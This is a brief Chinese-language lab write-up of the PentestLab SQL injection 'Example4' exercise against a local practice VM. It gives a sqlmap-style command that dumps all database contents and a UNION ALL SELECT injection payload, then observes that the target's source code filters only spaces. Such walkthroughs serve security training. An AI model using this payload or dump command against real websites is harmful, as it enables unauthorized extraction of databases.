我们打开靶机,选择“sql  injections”

选择“Example4”


PentestLab-web安全SQL注入-EXP4_f5



观察页面


PentestLab-web安全SQL注入-EXP4_sql_02

发现是数字型注入


我们使用工具测试

参数为


-u "http://192.168.29.148/sqli/example4.php?id=2" --dump all


payload为


id=2 UNION ALL SELECT NULL,CONCAT(0x7178626b71,0x784578484d42645479716e4e476f52646b5542437764597354524557714466414f6f74445061796f,0x71717a6b71),NULL,NULL,NULL-- -


结果


PentestLab-web安全SQL注入-EXP4_f5_03


存在sql漏洞


我们查看靶机的源代码


PentestLab-web安全SQL注入-EXP4_php_04


并没有对数字型的注入有防护

只对sql查询的空格做了防护。